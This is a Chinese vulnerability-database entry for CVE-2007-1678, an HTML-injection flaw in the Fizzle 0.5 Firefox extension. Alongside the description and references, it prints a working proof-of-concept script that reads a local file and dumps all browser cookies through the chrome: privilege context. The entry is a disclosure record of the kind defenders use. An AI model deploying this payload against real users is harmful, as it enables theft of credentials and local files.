Firefox Fizzle 扩展 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112549 漏洞类型 跨站脚本
发布时间 2007-03-26 更新时间 2007-03-27
CVE编号 CVE-2007-1678 CNNVD-ID CNNVD-200703-615
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/29783
https://cxsecurity.com/issue/WLB-2007030178
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-615
|漏洞详情
FirefoxFizzle0.5扩展中存在跨站脚本攻击漏洞。远程攻击者可以借助被chrome:URI处理程序执行的RSSfeeds,注入任意的web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/23144/info

Fizzle is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

This issue affects version 0.5; other versions may also be affected.

- ------------------------------------------------------------------------- POC: Local File Reading and Cookie Reading (The HTML entities MUST be used) - ------------------------------------------------------------------------- <script> function read(readfile) { var file = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); file.initWithPath(readfile); var is = Components.classes["@mozilla.org/network/file-input-stream;1"] .createInstance(Components.interfaces.nsIFileInputStream); is.init(file, 0x01, 00004, null); var sis = Components.classes["@mozilla.org/scriptableinputstream;1"] .createInstance(Components.interfaces.nsIScriptableInputStream); sis.init(is); var output = sis.read(sis.available()); alert(output); } read("C:\test.txt"); function getCookies() { var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"] .getService(Components.interfaces.nsICookieManager); var str = ''; var iter = cookieManager.enumerator; while (iter.hasMoreElements()) { var cookie = iter.getNext(); if (cookie instanceof Components.interfaces.nsICookie) { str += "Host: " + cookie.host + "\nName: " + cookie.name + "\nValue: " + cookie.value + "\n\n"; } } alert(str); } getCookies() </script>
|参考资料

来源:BUGTRAQ
名称:20070324Fizzle:FirefoxExtensionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/463816/100/0/threaded
来源:SECUNIA
名称:24654
链接:http://secunia.com/advisories/24654
来源:XF
名称:fizzle-rssfeed-xss(33227)
链接:http://xforce.iss.net/xforce/xfdb/33227
来源:BID
名称:23144
链接:http://www.securityfocus.com/bid/23144
来源:OSVDB
名称:33522
链接:http://www.osvdb.org/33522
来源:VUPEN
名称:ADV-2007-1112
链接:http://www.frsirt.com/english/advisories/2007/1112
来源:SREASON
名称:2480
链接:http://securityreason.com/securityalert/2480